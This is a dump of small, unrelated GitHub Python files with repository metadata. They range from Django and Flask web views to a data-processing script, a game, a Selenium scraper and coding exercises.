[[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]]\nprint(Solution().permute(nums))\n# %%\n","repo_name":"Leoteles/leetcode-exercises","sub_path":"permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18292252206","text":"from django.urls import path\nfrom .views import *\n\napp_name=\"carro\"\n\nurlpatterns = [ \n\n path(\"agregar//\", agregar_producto, name=\"agregar\"),\n path(\"eliminar//\", eliminar_producto, name=\"eliminar\"),\n path(\"restar//\", restar_producto, name=\"restar\"),\n path(\"limpiar/\", limpiar_carro, name=\"limpiar\"),\n\n]","repo_name":"Juiceb0x21/PetShopAavances","sub_path":"carro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"32956644643","text":"import re\nimport pandas as pd\nimport os\nimport sys\nimport json\nimport numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', type=str, dest='path', default='data/papers/', help='specifies the path to input dir')\n\nrootdir = parser.parse_args().path\n\n######################FUNCTIONS\n\ndef get_school_from_mail(mail, mapping):\n \"\"\"maps email to institution\"\"\"\n if mail in mapping:\n return (mapping[mail], mail)\n elif re.findall('[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*$', mail)[0] in mapping:\n double = re.findall('[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*$', mail)[0]\n return (mapping[double], double)\n else:\n triplet = re.findall('[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*$', mail)\n if len(triplet) > 0 and triplet[0] in mapping:\n return (mapping[triplet[0]], triplet[0])\n else:\n return (np.nan, mail)\n\ndef get_org_name(x):\n candidates = x.split('.')\n for c in candidates:\n if c in ['qq','sina','163']:\n return c\n lengths = np.array([len(z) for z in candidates])\n return candidates[lengths.argmax()]\n\n#############################\ncontents = []\ni = 0\nsource = []\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n if 'txt' in file:\n i += 1\n path = os.path.join(subdir, file)\n with open(path) as file:\n try:\n text = file.read()\n contents.append(text)\n source.append(path[len(rootdir):-4])\n except:\n name, message, content = sys.exc_info()\n print(message)\n\nschools = open('data/world_universities_and_domains.json').read()\nparsed_json = json.loads(schools)\n\n\nmapping = {}\ncountry_uni = {}\nfor j in parsed_json:\n mapping[j['domains'][0]] = j['name']\n country_uni[j['domains'][0]] = j['country']\n if len(j['domains']) > 1:\n mapping[j['domains'][1]] = j['name']\n country_uni[j['domains'][1]] = j['country']\n if len(j['domains']) > 2:\n mapping[j['domains'][2]] = j['name']\n country_uni[j['domains'][2]] = j['country']\n\n\nmapping['nie.edu.sg'] = \"National Institute of Education (NIE), Singapore\"\nmapping['rub.de'] = \"Ruhr-University Bochum\"\nmapping['uni-due.de'] = \"Universität Duisburg-Essen\"\nmapping['collide.info'] = \"Universität Duisburg-Essen\"\nmapping['dawsoncollege.qc.ca'] = \"Dawson College\"\nmapping['dawsoncollege.ca'] = \"Dawson College\"\nmapping['johnabbott.qc.ca'] = \"John Abbott College\"\nmapping['johnabbott.ca'] = \"John Abbott College\"\nmapping['vaniercollege.qc.ca'] = 'Vanier Colleege'\n\ninstitution = []\nfor text in contents:\n mails_in_paper = re.findall('[a-zA-Z0-9\\.\\-]*@[a-zA-Z0-9\\.\\-]*\\.[a-zA-Z0-9\\.\\-]*(?!\\S*\\:\\S*)', text)\n institution.append([(get_school_from_mail(m.split('@')[1].lower(), mapping), m, i) for i, m in enumerate(mails_in_paper)])\n\ninst = pd.DataFrame([(i[0][0],i[0][1], i[1],i[2], source[index]) for index, uni in enumerate(institution) for i in uni ],\n columns=['name', 'domain', 'mail','authorindex','file'])\ninst.loc[inst['name'].isna(),'name'] = inst[inst['name'].isna()].domain.map(lambda x: get_org_name(x))\ninst['country'] = inst.domain.map(country_uni)\n\ncountries = open('data/country-by-domain-tld.json').read()\nparsed_countries = json.loads(countries)\nparsed_countries = { parsed['tld']: parsed['country'] for parsed in parsed_countries}\n\nparsed_countries['.uk']= \"United Kingdom\"\nparsed_countries['.us'] = \"United States\"\n\ninst.loc[inst.country.isna(), 'country'] = inst[inst.country.isna()].domain.map(lambda x: re.findall(\"(\\.[a-zA-Z0-9]*$)\",x)[0]).map(parsed_countries)\ninst.loc[(inst.country.isna()) & (inst.name.isin(['qq','sina','163'])), 'country'] = 'China'\n\n\nprint('[Info] Saved universities data to ../data/Universities.csv')\ninst.to_csv('data/Universities.csv')\n","repo_name":"nourabassi/semester-project","sub_path":"Scripts/universities_extraction.py","file_name":"universities_extraction.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74024965049","text":"import matplotlib.pyplot as plt\r\nfrom utils import *\r\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\r\n AutoMinorLocator)\r\n\r\n#all of the tools to be compared, including scoring methods and model types (tuscan, chop-chop)\r\ntools = ['ssc' ,'tuscan-classification', 'wu-crispr', 'sgrnascorer2'] #'tuscan-regression'] #,'sgrnascorer2','wu-crispr','chop-chop-xu','chop-chop-doench','chop-chop-moreno']\r\n\r\n#the datasets these tools were ran on\r\ndatasets = ['xu']#,'doench']\r\n\r\n#setting up for plotting\r\npositions = range(0,20)\r\nx = np.arange(len(positions)) # the label locations\r\nwidth = 1 # the width of the bars together\r\nbarwidth = width / (len(tools)*len(datasets)) #the width of a single bar\r\nfig, ax = plt.subplots(figsize=(10,7))\r\nspacer = 0\r\n\r\n#add separators for each position in the guide\r\nfor p in range(0,21):\r\n plt.axvline(x=p, color=\"black\",linewidth=0.2)\r\n\r\ntool_positions = [] #where the tool name is to be placed\r\ntool_labels = [] #what the tool name is\r\n\r\n#plotting data method by method\r\ncnt = 0\r\nfor tool in tools:\r\n for data in datasets:\r\n\r\n #load data from pickle\r\n pickleFileName = \"SHAP-\" + tool + \"-\" + data\r\n #get a list of tuples (avg shap val, feature name)\r\n featureImp = getAvgShapValues(pickleFileName)\r\n #creates dictionary where average[nucleotide id][position] = the average shap value of the nucleotide being at that position\r\n averages = getShapValsForPosFeatures(featureImp) #function def in utils\r\n\r\n #plot the values of each nucleotide at x_coord\r\n x_coord = x + spacer + barwidth/2 + barwidth*cnt\r\n pA = ax.bar(x_coord, averages[0], barwidth, color=\"#1f77b4\")\r\n pC = ax.bar(x_coord, averages[1], barwidth, color=\"#ff7f0e\")\r\n pG = ax.bar(x_coord, averages[2], barwidth, color=\"#2ca02c\")\r\n pT = ax.bar(x_coord, averages[3], barwidth, color=\"#d62728\")\r\n\r\n #add the name of the tool under each bar [will use the two arrays for this later]\r\n for xp in x_coord:\r\n tool_positions.append(xp)\r\n tool_labels.append( getShorthand(tool) )\r\n\r\n cnt = cnt+1\r\n\r\n#plot names of tools at the bottom\r\nplt.xticks(tool_positions, tool_labels, rotation='vertical')\r\n\r\n#plot the number of the guide position at the top\r\nax_t = ax.secondary_xaxis('top')\r\nax_t.tick_params(axis='x', direction='out', width=0, length=0, color=\"#D3D3D3\")\r\nax_t.set_xticks([p + 0.5 for p in positions])\r\nax_t.set_xticklabels(positions)\r\n\r\n#plot a line at 0\r\nplt.plot(range(-1,21), [0]*22, color='black', linewidth=0.2)\r\n\r\n\r\nplt.ylabel(\"SHAP values\")\r\nplt.xlabel(\"Models ran on Xu 2015\")\r\nplt.title(\"Guide positions\")\r\nplt.legend((pA[0], pC[0], pG[0], pT[0]), ('A', 'C', 'G', 'T'))\r\nplt.savefig('compare.png',bbox_inches=\"tight\")\r\n\r\nplt.show()\r\n","repo_name":"avaspataru/SHAP-Value-Plotting-for-CRISPR-tools","sub_path":"src/comparePositionTools.py","file_name":"comparePositionTools.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7728673250","text":"\"\"\"Application blueprint\"\"\"\n\nimport secrets\n\nfrom flask import Blueprint, abort, request, jsonify, Response\n\nfrom vitamin_d_resource_auth.models import User, Administrator, Session\n\n\nblueprint = Blueprint('application', __name__)\n\n@blueprint.route('/auth', methods=['POST'])\ndef post_auth():\n \"\"\"Post auth, check authentication\"\"\"\n user = User.objects(session__code=request.json['session_code']).first()\n if user:\n return jsonify({'username': user.username})\n admin = Administrator.objects(session__code=request.json['session_code']).first()\n if admin:\n return jsonify({'username': admin.username})\n return abort(401)\n\n\n@blueprint.route('/login', methods=['POST'])\ndef post_login():\n \"\"\"Post login\"\"\"\n username = request.json['username']\n user = User.objects(username=username).first()\n if user.password == request.json['password']:\n session_code = secrets.token_urlsafe()\n user.session = Session(code=session_code)\n user.save()\n return jsonify({'session_code': session_code})\n\n\n@blueprint.errorhandler(404)\ndef page_not_found(error):\n \"\"\"Handle 404 errors\"\"\"\n print(error)\n return abort(404)\n","repo_name":"joostsijm/vitamin_d_core-backend","sub_path":"vitamin_d_resource_auth/src/vitamin_d_resource_auth/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24367816204","text":"\nimport const\nEIGHT_DIRECTION = [[-1, -1], [-1, 1], [1, 1],\n [1, -1], [1, 0], [0, 1], [-1, 0], [0, -1]]\n\n\nclass Player:\n def __init__(self, color, board):\n self.color = color # color of player\n self.board = board # board\n\n def empty_squares(self):\n \"\"\"\n find empty squares\n :return: squares that can still be placed with tiles\n \"\"\"\n positions = [(i+1, j+1)\n for i in range(self.board.num_of_square)\n for j in range(self.board.num_of_square)]\n positions = filter(\n lambda x: x not in self.board.tiles.keys(), positions)\n return list(positions)\n\n def has_legal(self):\n \"\"\"\n judge if current player still can make legam moves\n :return: boolean, True if still have legal moves\n \"\"\"\n positions = self.empty_squares()\n for pos in positions:\n increment = len(self.calc_flip(\n pos))\n if increment > 0:\n return True\n return False\n\n def calc_flip(self, pos):\n \"\"\"\n calculate flip scenario without actually flip them\n :param pos: intended position for the new tile\n :return: list of to-be-flipped positions\n \"\"\"\n flip_pos_all = []\n for direction in EIGHT_DIRECTION:\n curr_pos = pos\n flip_pos_one = []\n while True:\n curr_pos = (curr_pos[0]+direction[0],\n curr_pos[1]+direction[1])\n if curr_pos not in self.board.tiles.keys():\n break\n curr_tile = self.board.tiles[curr_pos]\n if curr_tile.color == self.color:\n flip_pos_all += flip_pos_one\n break\n flip_pos_one.append(curr_tile.tile_pos)\n return flip_pos_all\n\n def flip(self, positions):\n \"\"\"\n flip the tiles on board and update tile color count\n :param positions: list of to-be-flipped positions\n :return:\n \"\"\"\n for pos in positions:\n self.board.tiles[pos].color = self.color\n if self.color == const.BLACK:\n self.board.wnum -= 1\n self.board.bnum += 1\n else:\n self.board.wnum += 1\n self.board.bnum -= 1\n\n def drop_tile(self, tile_pos, flip_pos):\n \"\"\"\n add tile to board and flip tiles\n :param tile_pos: intended position for the new tile\n :param flip_pos: list of to-be-flipped positions\n :return:\n \"\"\"\n self.board.add_tile(self.color, tile_pos)\n self.flip(flip_pos)\n","repo_name":"joyahuang/Games","sub_path":"Othello/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7573694280","text":"\"\"\"\nDjango settings for BloodFinder project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nfrom settings import *\nimport settings\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDEBUG = True\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'http'\n\n# INSTALLED_APPS = settings.INSTALLED_APPS + (\n# # ...\n# # 'django.contrib.staticfiles',\n# # ...\n# 'debug_toolbar',\n# )\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db2.sqlite3'),\n }\n}\n#\n# DATABASES = {\n# 'default': {\n# 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n# 'NAME': 'enhanced_cwe2',\n# 'USER': 'django',\n# 'PASSWORD': 'django',\n# 'HOST': 'localhost',\n# }\n# }","repo_name":"CaveSentinels/ReportWriter","sub_path":"ReportWriter/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36806473043","text":"a=['sukanya','rani','subhshree']\ni=0\nwhile i int:\n nums.sort()\n count=0\n for right in range(2,len(nums)):\n left=0\n curr=right-1\n while left < right:\n if nums[left]+nums[curr]>nums[right]:\n count+=right-left\n right-=1\n else:\n left+=1\n return count\n\n\n\n\n\n\n\n\n\n# from typing import List\n# class Solution:\n# def triangleNumber(self, nums: List[int]) -> int:\n# nums.sort()\n# mm=[]\n # for i in range(len(nums)):\n # left=i+1\n # right=len(nums)-1\n # while leftnums[right] and 2*(nums[i]+nums[left])>nums[right]:\n # mm.append([nums[i],nums[left],nums[right]])\n # if nums[left]==nums[left+1]:\n # left+=1\n # elif nums[right]==nums[right-1]:\n # right-=1\n # else:\n # left+=1\n # right-=1\n # elif nums[i]+nums[left]nums[right]:\n # left+=1\n # elif nums[i]+nums[left] list[dict]:\n promo_str = get_promo_str(check_upcoming_promos)\n meta_data = element[\"promotions\"][promo_str][0][\"promotionalOffers\"]\n\n return meta_data\n\n\ndef trim_date(date_str: str) -> str:\n return f\"{extract_day(date_str)} @ {extract_hour(date_str)}h\"\n\n\ndef extract_hour(date_str: str) -> str:\n return date_str[11:13]\n\n\ndef extract_day(date_str: str) -> str:\n return date_str[:10]\n\n\ndef to_discount_value(price_multiplier_in_percent: int) -> int:\n discount_value = 100 - price_multiplier_in_percent\n return discount_value\n\n\ndef to_discount_symbol(discount_type: str) -> str:\n discount_symbol = \"%\" if discount_type == \"PERCENTAGE\" else \"???\"\n return discount_symbol\n\n\ndef print_promos(\n filtered_promos: list[dict],\n check_upcoming_promos: bool = True,\n) -> bool:\n for e in get_sorted_promos(filtered_promos, check_upcoming_promos):\n name = e[\"title\"]\n meta_data = get_meta_data(e, check_upcoming_promos)\n\n for promotional_offer in meta_data:\n start_date = trim_date(promotional_offer[\"startDate\"])\n end_date = trim_date(promotional_offer[\"endDate\"])\n discount = to_discount_value(\n promotional_offer[\"discountSetting\"][\"discountPercentage\"],\n )\n symbol = to_discount_symbol(\n promotional_offer[\"discountSetting\"][\"discountType\"],\n )\n\n print(\n f\"- [ {discount:3d}{symbol} off ] {start_date} -> {end_date} : {name}\",\n )\n\n return True\n","repo_name":"woctezuma/egs-15DaysofGames","sub_path":"src/print_utils.py","file_name":"print_utils.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"38878507475","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nimport time as t\n\n# number as per the dropdown in the site\ndistrict = {\n\t'All' \t\t\t\t\t: 0 ,\n\t'THIRUVANANTHAPURAM'\t: 1 ,\n\t'KOLLAM' \t\t\t\t: 2 ,\n\t'PATHANAMTHITTA' \t\t: 3 ,\n\t'ALAPPUZHA' \t\t\t: 4 ,\n\t'KOTTAYAM' \t\t\t\t: 5 ,\n\t'IDUKKI' \t\t\t\t: 6 ,\n\t'ERNAKULAM' \t\t\t: 7 ,\n\t'THRISSUR' \t\t\t\t: 8 ,\n\t'PALAKKAD' \t\t\t\t: 9 ,\n\t'MALAPPURAM' \t\t\t: 10 ,\n\t'KOZHIKODE' \t\t\t: 11 ,\n\t'WAYANAD' \t\t\t\t: 12 ,\n\t'KANNUR' \t\t\t\t: 13 ,\n\t'KASARAGOD' \t\t\t: 14 ,\n\t'Other' \t\t\t\t: 15 ,\n}\n\nyear = {\n\t2021: 0,\n\t2020: 1,\n\t2019: 2,\n\t2018: 3,\n\t2017: 4,\n\t2016: 5,\n\t2015: 6\n}\n\ndegree = {\n\t'UG' : 1,\n\t'PG' : 2,\n}\n\nprogram = {\n\t'All' \t\t\t: 0 ,\n\t'B.Tech' \t\t: 1 ,\n\t'B.Arch' \t\t: 2 ,\n\t'Hotel' \t\t: 3 ,\n\t'Management' \t: 4 ,\n\t'and' \t\t\t: 5 ,\n\t'Catering' \t\t: 6 ,\n\t'Technology' \t: 7 ,\n\t'B.Des' \t\t: 8 ,\n}\n\n\n# to select the item in the dropdown (in site)\ndef select_combobox_x(driver,dropdown_val):\n\tdriver[0].click()\n\tdriver[0].send_keys(Keys.ARROW_DOWN*dropdown_val)\n\tdriver[0].send_keys(Keys.RETURN)\n\t# t.sleep(5)\n\n\n# to print year, district, degree and program in dict format\ndef checklist(driver):\n\tif type(driver) == list:\n\t\tprint(\"{\")\n\t\tfor i,j in enumerate(driver[0].text.split()):\n\t\t\tprint(\"\\t\\'\",j,'\\':',i,\",\")\n\t\tprint(\"}\")\n\n\ndef automated_choose(driver):\t\n\t#1\n\tselect_yr = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[1]/span[1]/select\")\n\tprint(' - select complete')\n\tchecklist(select_yr)\n\tselect_combobox_x(select_yr, year[2015])\n\n\t#2\n\tselect_dis = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[1]/span[2]/select\")\n\tprint(' - select complete')\n\tchecklist(select_dis)\n\tselect_combobox_x(select_dis, district['ERNAKULAM'])\n\n\t#3\n\tselect_deg = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[2]/span[1]/select\")\n\tprint(' - select complete')\n\tchecklist(select_deg)\n\tselect_combobox_x(select_deg, degree['UG'])\n\n\t#4\n\tselect_prog = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[2]/span[2]/select\")\n\tprint(' - select complete')\n\tchecklist(select_prog)\n\tselect_combobox_x(select_prog, program['B.Tech'])\n\n\n# to iterate the selenium_scraped_element \ndef checklist_x(driver):\n\tif type(driver) == list:\n\t\tfor i in driver:\n\t\t\tif type(i) != list:\n\t\t\t\tprint(i.text.split('\\n'))\n\t\t\tprint()\n\t\t\t\n# to get affiliated links for further scrapping\ndef get_affiliated_links(driver):\n\t# 1\n\tselect_yr = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[1]/span[1]/select\")\n\tprint(' - select complete')\n\tchecklist(select_yr)\n\tselect_combobox_x(select_yr, year[2020])\n\n\ta = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/table/tbody/tr/td[1]/span/a\")\n\tprint(' - select complete')\n\taffiliated_links =[]\n\tif type(a) == list:\n\t\tfor i in a:\n\t\t\taffiliated_links.append(i.get_attribute(\"href\"))\n\n\twith open('affiliated_links.py','w') as f:\n\t\tf.write(\"affiliated_links=['\")\n\t\tf.write(\"',\\n'\".join(affiliated_links))\n\t\tf.write(\"']\")\n\n\n# main\ndef ktu_scrapper():\n\tdriver = webdriver.Edge(\"msedgedriver.exe\")\n\tdriver.get('https://ktu.edu.in/eu/afn/affiliationInstitutes.htm')\n\t\n\t# automated_choose(driver)\n\n\tget_affiliated_links(driver)\t\n\n\t# from affiliated_links import affiliated_links\n\t# print(affiliated_links)\n\t\n\tdriver.implicitly_wait(5)\n\n\tdriver.close()\n\nktu_scrapper()\n","repo_name":"amankshihab/keam-project-web-app","sub_path":"scrapping_functions/ktu_scrapper.py","file_name":"ktu_scrapper.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29312673849","text":"import random\n\ndef adivina_mi_numero():\n numero_secreto = random.randint(1, 20)\n intentos = 5\n\n print(\"¡Bienvenido al juego Adivina mi número!\")\n print(\"Tienes 5 intentos para adivinar el número secreto (entre 1 y 20). ¡Buena suerte!\")\n\n while intentos > 0:\n print(\"\\nIntento\", 6 - intentos)\n numero = int(input(\"Ingresa un número: \"))\n\n if numero == numero_secreto:\n print(\"¡Adivinaste, mi número era\", numero_secreto, \"!\")\n return\n\n if numero < numero_secreto:\n print(\"Mi número es mayor.\")\n else:\n print(\"Mi número es menor.\")\n\n intentos -= 1\n\n print(\"No adivinaste, ¡mi número era\", numero_secreto, \"!\")\n\nadivina_mi_numero()\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej12/hito1_ej12_f2f14c7d9264c2a1470f6fc36dad8973.py","file_name":"hito1_ej12_f2f14c7d9264c2a1470f6fc36dad8973.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74681749049","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom .models import Product\nfrom .forms import ProductForm, RawProductForm\n# Create your views here.\n\n# def product_detail_view(request):\n# obj = Product.objects.get(id=1)\n# print(\"printing obj\")\n# print(obj.description)\n# # context={\n# # 'title':obj.title,\n# # 'description':obj.description\n# # }\n# context = {\n# 'object':obj\n# }\n# return render(request,'product/product_detail.html',context)\n\ndef product_detail_view(request,id):\n #obj = Product.objects.get(id=my_id)\n obj = get_object_or_404(Product,id=id)\n print(\"printing obj\")\n print(obj.description)\n\n context = {\n 'object':obj\n }\n return render(request,'product/product_detail.html',context)\n\n\n\n\ndef product_create_view(request):\n my_form = RawProductForm()\n if request.method == 'POST':\n my_form = RawProductForm(request.POST)\n if my_form.is_valid():\n print(my_form.cleaned_data)\n Product.objects.create(**my_form.cleaned_data)\n #print(my_form.save())\n #my_form.save()\n else:\n print(my_form.errors)\n\n context = {\n 'form':my_form\n }\n return render(request,'product/product_create.html',context)\n\n\ndef product_update_view(request,id): #rendering with initial data\n initial_data = {\n 'title':\"My this awsome title\"\n }\n obj = Product.objects.get(id=id)\n form = ProductForm(request.POST,None,obj)\n if form.is_valid():\n print(form.cleaned_data)\n form.save()\n else:\n print(form.errors)\n\n context = {\n 'form':form\n }\n return render(request,'product/product_update.html',context)\n \n\n\n\n\n\n# def product_create_view(request):\n# form = ProductForm(request.POST or None)\n# #print(form)\n# if form.is_valid():\n# print(\"print save\")\n# print(form.save())\n# form.save()\n \n# context = {\n# 'form':form\n# }\n# return render(request,'product/product_create.html',context)\n\n\ndef product_delete_view(request,my_id):\n #obj = Product.objects.get(id=my_id)\n obj = get_object_or_404(Product,id=my_id)\n print(\"printing obj\")\n print(obj.description)\n if request.method == 'POST': \n obj.delete()\n return redirect('../../')\n\n context = {\n 'object':obj\n }\n return render(request,'product/product_delete.html',context)\n\ndef product_list_view(request):\n query_set = Product.objects.all()\n print(\"printing obj\")\n print(query_set)\n\n for a in query_set:\n print(a.get_absolute_url)\n\n context = {\n 'object_list':query_set\n }\n return render(request,'product/product_list.html',context)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"daveotengo/djapp","sub_path":"src/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72313293050","text":"from Stack import Stack\r\n\r\n\r\ndef sort_expression(expression):\r\n\tnum = \"\"\r\n\tsort_list = []\r\n\texpression =expression.replace(\" \", \"\")\r\n\tfor i in expression:\r\n\t\tif (i == \".\" or i.isdigit()):\r\n\t\t\tnum += i\r\n\t\telse:\r\n\t\t\tif len(num) != 0:\r\n\t\t\t\tsort_list.append(float(num))\r\n\t\t\tnum = \"\"\r\n\t\t\tsort_list.append(i)\r\n\r\n\tsort_list.append(float(num))\r\n\treturn sort_list\r\n\r\n\r\ndef eval_exp(expression):\r\n\tdef run(top = 10):\r\n\t\twhile number_stack.size() > 1 and getPriority(operator_stack.top()) <= top:\r\n\t\t\ty = number_stack.pop()\r\n\t\t\tx = number_stack.pop()\r\n\t\t\t\t\t\r\n\t\t\tf = getFunc(operator_stack.pop())\r\n\t\t\tnumber_stack.push(f(x,y))\r\n\r\n\toperator_stack = Stack()\r\n\tnumber_stack = Stack()\r\n\toperator = {\r\n\t\t \"^\" : (1, lambda x,y : x**y),\r\n\t\t \"*\" : (2, lambda x,y : x*y),\r\n\t\t \"/\" : (2, lambda x,y : x/y),\r\n\t\t \"+\" : (3, lambda x,y : x+y),\r\n\t\t \"-\" : (3, lambda x,y : x-y),\r\n\t\t \"=\" : (4,lambda x, y : x==y),\r\n\t\t \"<\" : (4,lambda x, y : x\" : (4,lambda x, y : x>y),\r\n\t\t}\r\n\r\n\tgetPriority = lambda sym: operator[sym][0]\r\n\tgetFunc = lambda sym: operator[sym][1]\r\n\r\n\texpr_list = sort_expression(expression)\r\n\t\r\n\r\n\t\r\n\tfor token in range(len(expr_list)):\r\n\t\t#If number\r\n\t\tif (token %2 == 0):\r\n\t\t\tnumber_stack.push(expr_list[token])\r\n\t\t\t\r\n\r\n\t\t#If operator\r\n\t\telse:\r\n\t\t\tif (operator_stack.isEmpty() or (getPriority(operator_stack.top()) > getPriority(expr_list[token])) ):\r\n\t\t\t\toperator_stack.push(expr_list[token])\r\n\t\t\telse:\r\n\t\t\t\trun(getPriority(expr_list[token]))\r\n\t\t\t\toperator_stack.push(expr_list[token])\r\n\t\r\n\trun()\r\n\t\r\n\treturn number_stack.pop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tprint(\"Arithmetic test:\")\r\n\tprint(eval_exp(\"2+4+2\"))\r\n\tprint(eval_exp(\"7*3/4/5\"))\r\n\tprint(eval_exp(\"1+2/3+4\"))\r\n\tprint(eval_exp(\"1-4/ 2 / 9\"))\r\n\tprint(eval_exp(\"1.01^10\"))\r\n\r\n\tprint(\"\\nComparison test:\")\r\n\tprint(eval_exp(\"10-1 = 19\"))\r\n\tprint(eval_exp(\"12/2 < 32/4\"))\r\n\tprint(eval_exp(\"0.99^10 > 2\"))","repo_name":"ZaidMinhas/COMP-352_Topics","sub_path":"Stacks/Evaluating Arithmetic Expressions.py","file_name":"Evaluating Arithmetic Expressions.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1407625170","text":"# import cv2\n\n# #print(\"Before URL\")\n# # cap = cv2.VideoCapture('http://192.168.100.12:8080/jsfs.html')\n# cap = cv2.VideoCapture('https://www.youtube.com/watch?v=2H1Gho3LOUE')\n# #print(\"After URL\")\n\n# while True:\n\n# #print('About to start the Read command')\n# ret, frame = cap.read()\n# #print('About to show frame of Video.')\n# cv2.imshow(\"Capturing\",frame)\n# #print('Running..')\n\n# if cv2.waitKey(1) & 0xFF == ord('q'):\n# break\n\n# cap.release()\n# cv2.destroyAllWindows()\n\n\n# import cv2\n# import urllib.request as ur\n# import numpy as np\n\n# stream = ur.urlopen('http://192.168.100.12:8080/browserfs.html')\n# bytes = ''\n# while True:\n# bytes += stream.read(1024)\n# a = bytes.find('\\xff\\xd8')\n# b = bytes.find('\\xff\\xd9')\n# if a != -1 and b != -1:\n# jpg = bytes[a:b+2]\n# bytes = bytes[b+2:]\n# i = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.CV_LOAD_IMAGE_COLOR)\n# cv2.imshow('i', i)\n# if cv2.waitKey(1) == 27:\n# exit(0) \n\nimport numpy as np\nimport cv2\n\n# Open a sample video available in sample-videos\nvcap = cv2.VideoCapture('http://192.168.100.12:8080/browserfs.html')\n#if not vcap.isOpened():\n# print \"File Cannot be Opened\"\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = vcap.read()\n #print cap.isOpened(), ret\n if frame is not None:\n # Display the resulting frame\n cv2.imshow('frame',frame)\n # Press q to close the video windows before it ends if you want\n if cv2.waitKey(22) & 0xFF == ord('q'):\n break\n else:\n print (\"Frame is None\")\n break\n\n# When everything done, release the capture\nvcap.release()\ncv2.destroyAllWindows()\nprint (\"Video stop\")","repo_name":"maods2/SGL-System","sub_path":"webcamip.py","file_name":"webcamip.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21928064327","text":"\"\"\"\nValidating Email\nAddresses With a\nFilter\nYou are given an integer followed by email addresses. Your task is to print a list containing only\nvalid email addresses in lexicographical order.\nValid email addresses must follow these rules:\nIt must have the username@websitename.extension format type.\nThe username can only contain letters, digits, dashes and underscores\n.\nThe website name can only have letters and digits .\nThe extension can only contain letters .\nThe maximum length of the extension is .\n\"\"\"\n\n\ndef fun(s):\n # return True if s is a valid email, else return False\n try:\n username, url = s.split(\"@\")\n website, extension = url.split(\".\")\n except ValueError:\n return False\n if username.replace(\"-\", \"\").replace(\"_\", \"\").isalnum() is False:\n return False\n elif website.isalnum() is False:\n return False\n elif extension.isalpha() is False:\n return False\n elif len(extension) > 3:\n return False\n else:\n return True\n\n\ndef filter_mail(x):\n return list(filter(fun, x))\n\n\nn = 3\nemails = [\"lara@hackerrank.com\", \"brian-23@hackerrank.com\", \"britts_54@hackerrank.com\"]\n\nfiltered_emails = 